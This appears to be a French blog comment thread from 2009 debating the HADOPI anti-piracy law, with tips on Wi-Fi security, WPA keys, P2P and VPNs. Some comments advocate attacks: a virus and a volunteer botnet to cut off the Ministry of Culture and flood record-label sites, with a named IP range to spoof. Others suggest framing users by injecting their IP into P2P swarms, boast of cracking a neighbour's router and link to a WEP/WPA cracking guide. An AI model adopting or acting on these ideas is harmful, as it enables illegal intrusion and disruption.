Et si au contraire… on rendait leur log de connexion tellement gros qu’ils seront inexploitables.
En multipliant les connexions et en téléchargant sans cesse des documents légaux…
il faudrait savoir exactement ce qu’ils enregistrent comme évênement et comme flux, peut être en demande d’avoir accès à leur log sous couvert des droits de la CNIL (accès aux infos nominatives)
D’ailleurs je pense que légalement notre fai doit nous avertir qu’il enregistre tout nos faits et gestes… pour que ça soit exploitable juridiquement.
01 mai 2009 à 18:58
je trouverais plus malin de commencer à s’en prendre en masse aux fauteurs d’Hadopi. Je veux parler de ces gens qui n’ont pas voulu investir à temps comme il fallait, et qui ont réussi à convaincre l’Etat que leurs intérêts privés étaient une cause nationale.
Vous ne voyez pas qui je veux dire ? Ben, disons, y en a qui pressent des galettes, et y en a qui touchent des galettes. Je parle des gros, bien sûr. Vous ne voyez toujours pas ?
Un mois de bombardement, et il appelleront Albanel au secours. On parie ?
08 mai 2009 à 13:11
Bonjour à tous,
Ce qui va probablement nous consoler sous peu, c’est d’imaginer la tête du politique, victime d’un hacking d’ip recevant sa notification de coupure. La loi est injuste, mal conçue, mais son application va donner lieu à des cas de franche rigolade; je parie à 10 contre 1 qu’en l’état elle ne passera pas l’année.
09 mai 2009 à 23:46
Pour le wifi passez au WPA, ça offre une excellente sécurité pour le moment. Par contre le wep, vous pouvez le mettre dans les chiottes et tirer la chasse.
10 mai 2009 à 2:54
http://virtuelnews.com/hacking/les-hackers-contre-hadopi-guerilla-numerique/2009/05
est directement repris de
http://fr.readwriteweb.com/2009/03/31/prospective/hackers-contre-hadopi-chronique-guerilla/
en indiquant auteur et source avec le bon lien
mais sans en indiquer la date (> 1mois)
11 mai 2009 à 17:24
WPA ou WEP, les deux sont parfaitement insécures, la seule solution, c’est de fermer le Wifi…
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
11 mai 2009 à 22:49
@Fabrice
Est-ce que tu as lu l’article que tu cite ? Il confirme ce qui était déjà dit plusieurs fois :
WPE est défecteux par sa conception, il est toujours crackable.
WPA est seulement crackable par des attaques dictionnaire. Pour WPA-PSK cette attaque peut être faite offline, mais ça ne change rien au fait que c’est une seulement une attaque dictionaire. Donc un WIFI avec clé “francois13” sera effectivement vite cracké.
Un clé du type uh8G(mN9landu!7énksczloq est au moins aujourd’hui parfaitement sur, au moins si l’algo WPA avait été correctement implementé. Pour moi un clé de ce type reste tout à fait utilisable, car il suffit de le taper une fois et le mémoriser sur son portable.
12 mai 2009 à 14:23
Au final, l’un est facile a craquer, l’autre plus difficile, non ? (mais craquable)
12 mai 2009 à 17:46
Aujourd’hui pour protéger son Wi-Fi, il faut (par ordre de priorité) :
- activer la protection WPA (ou WPA 2 AES si possible)
- choisir un mot de passe WPA très long (25 caractères ou plus)
- changer le mot de passe d’administration de sa box
- activer le filtrage par adresse MAC (oui c’est un peu chiant je sais)
- désactiver la diffusion du SSID (oui c’est très chiant je sais).
Si vous suivez ces conseils et que vous vous faîtes pirater votre Wi-Fi aujourd’hui ou dans les 2 ans à venir, je me coupe une jambe.
12 mai 2009 à 17:52
@Dodot
On est bien d’accord, moins de 1% de la population Française est en mesure de comprendre ce que tu viens d’écrire ;-)
Même moi qui le comprends, rien qu’à l’idée de le faire, je suis fatigué…
12 mai 2009 à 18:44
Non on n’est pas vraiment d’accord, mais heureusement pour les feignants comme toi, les FAI commencent à prendre conscience du problème, et moi qui suis chez Neuf je constate avec joie que maintenant les 3 premiers points sont configurés à l’avance ! De quoi surfer en Wi-Fi tranquille !
12 mai 2009 à 18:48
Mon point n’est pas tant qu’il n’y a pas moyen de sécuriser, disons a 99%, un accès Wifi, mais de souligner que c’est hors de portée de 99% des utilisateurs actuels d’internet, et notamment de la dizaine de millions de box deja en usage actuellement ;-)
J’espère bien qu’à l’avenir les box seront fournies par défaut avec plus de sécurité, mais pour les 18 millions de français deja connectés, ce n’est pas le cas…
12 mai 2009 à 19:18
J’avais bien compris. Mais je doute de la pertinence de tes statistiques :)
12 mai 2009 à 22:15
Ya qu’à Boycotter tous ces connards de distributeurs de CD/DVD.
Et s’ils ne vendent plus rien (c’est tout ce qu je leur souhaite), ils vont demander l’abolition de la loi HADOPI, et redemander l’autorisation du “téléchargement illégal”, qui favorise quand même les achats de CD/DVD…
12 mai 2009 à 23:48
La riposte graduée ….… des Internautes.
C’est possible avec un Virus.
En effet grâce à un virus, il est parfaitement envisageable de couper la connexion Internet du ministère de la culture, y compris de saturer les sites de vente en ligne des supermarchés de la musique et de la video, Universal, Sony Music, Warner, etc…
Dans la mesure où la loi HADOPI sert tout d’abord à renforcer leurs recettes (et non pas les revenus des artistes qui sont considérés comme des paysans qui produisent des salades).
Spoofer les majors et leurs sites de distributions en ligne causerait un préjudice financier non négligeable.
En effet, en ce qui concerne le ministère de la culture, les IP a spoofer sont de 143.126.0.0 à 143.126.255.255 en sachant qu’il doit n’y avoir qu’une faible poignée de proxies (à scanner donc).
Albanel serait la première victime de la coupure d’ADSL.
De plus, tous les opposants à la loi HADOPI pourraient même volontairement installer ce virus sur leur ordinateur pour constituer un formidable botnet, qui lui aussi toucherait la où ca fait mal : le porte-monnaie.
13 mai 2009 à 3:58
” Non on n’est pas vraiment d’accord, mais heureusement pour les feignants comme toi, les FAI commencent à prendre conscience du problème, et moi qui suis chez Neuf je constate avec joie que maintenant les 3 premiers points sont configurés à l’avance ! De quoi surfer en Wi-Fi tranquille ! ”
Comment tu me dégoutes :( Moi qui savais faire les 3 premières choses!
Par contre, les deux dernières me sont totalement inconnus o_O !
13 mai 2009 à 8:57
C’est du pifomètre, je l’avoue… quelles seraient tes estimations sur la proportion d’internautes capables de sécuriser correctement leur accès Wifi ? (en dehors de la solution qui consiste à installer le mouchard Hadopi, j’entends)
13 mai 2009 à 18:56
Nos politiciens sont vraiment pas en phase avec notre époque !
Au vue de la qualité, il faut l’avouer, vraiment pouri de se que l’on trouve sur le net, il aurait put trouver des solutions genres redevance internet.
Perso acheter un fichier MP3 tout pouri 2€ mais c’est une honte. Du 24bit 96Khz Ok j’achète. Ou au moins la qualité CD.
J’espère que çà fera tout drole à tout les députés, les sénateur, les maires quand un petit malin en informatique trouvera leur IP…
19 mai 2009 à 13:31
@Fabrice : le mouchard HADOPI oui très bonne idée ;)
Il me semble que grâce à la loi HADOPI, même en utilisant un P2P “anonyme” on ne serait pas à l’abri de la riposte graduée, car en cas d’accusation, grâce à la présomption de culpabilité, il faut prouver que l’on était dans l’impossibilité de télécharger tel fichier à telle heure !
Pour les curieux j’ai écrit un petit article là-dessus sur mon blog…
19 mai 2009 à 13:40
@Dotdot
oui, en effet, personne n’est à l’abri… La seule solution sécure à 100% est d’avoir deux lignes internet à deux noms différents, et installer sur l’une d’entre elles un vieux PC équipé du mouchard sur lequel on ne fait pas grand chose. Elle sert de backup en cas de défaillance de la première, et de bouée de sauvetage en cas de frappe de l’Hadopi.
C’est d’ailleurs cette solution que je commence à rencontrer de plus en plus autour de moi, il faut dire que je suis entouré de gens pour qui trois mois de coupure équivaut à une catastrophe professionnelle, et qui ont par ailleurs les moyens de se payer 60€/mois de frais pour leur accès internet…
20 mai 2009 à 14:55
Mais je me pose une question quand même… Le P2P en lui même n’est pas illégale car il y a un certain nombre de fichiers libres de droits sur ces réseau. Le fait de ne regarder que les gens qui se connectent sur un serveur (type eMule) qui partage du contenu libre de droit ET du contenu illégale, sans regarder ce qu’ils téléchargent, c’est pas un peu illogique ? Car ont peut très bien ne télécharger que du contenu libre de droit, sans jamais touché à du contenu illégale, même si on est connecté 24h/24 a un serveur eMule… De même on peux ne rien partager, ni ne rien télécharger et y être quand même connecté !
Par exemple j’utilise sur mon NAS mlDonkey qui permet de télécharger sur différents protocoles. La ça fait bien 3 semaines que je n’ai aucun fichier Donkey (réseau de eMule) qui télécharge (j’utilise principalement le réseau Torrent) et pourtant je suis connecté a un serveur Donkey sans rien partager ni télécharger dessus !
20 mai 2009 à 15:16
A priori, les technos mise en place (depuis longtemps) par Investigo et consort récupèrent les IP qui se partagent un fichier précis (copyrighté), donc pas de soucis de ce coté là. Par contre, afficher son IP ou que ce soit (comme ce que tu viens de faire en visitant ce blog, cher 217.128.96.XXX) et que la simple possession de cette IP permet de la réinjecter comme un faux positif dans un réseau partageant un fichier copyrighté pour qu’Hadopi frappe demain à ta porte…
Gniark gniark gniark… non, rassure toi, je ne suis pas aussi maléfique… Mais bon, sache que c’est possible…
24 mai 2009 à 16:57
J’ai cracké ma première livebox sécurisé aujourd’hui =D
merci hadopi de m’avoir donné l’envie d’apprendre maintenant je pourrais me connecter partout ;)
25 juin 2009 à 18:32
salut si vous voulez trouver des sites de streaming vous pouvez aller sur
http://www.delavideo.com
;)
10 septembre 2009 à 16:05
Pour HADOPI c’est très simple, elle se fera choper elle même car ces hackers sont capables de tout. Je crois que c’est pas la meilleure manière de lutter contre le téléchargement illégal.
17 septembre 2009 à 12:49
On se marre bien !
Les brillants informaticiens se font souvent chier. Pour eux, quel challenge ludique que de contrer systématiquement les contre-mesures !!
Il existe underground un protocole très efficace qui permet de leurrer les FAi en leur faisant croire qu’on surfe tranquillement alors qu’on télécharge. Pour l’instant encore un peu hardu à mettre en place, ce système va connaître un brillant essor dans quelques mois.
La vie est belle.
17 septembre 2009 à 18:57
oui, Hadopi a généré une forme d’innovation assez curieuse… j’ai moi même un soft de VPN d’une simplicité désarmante, il y a 6 mois, ce type de techno était super pénible à installer… Merci Hadopi.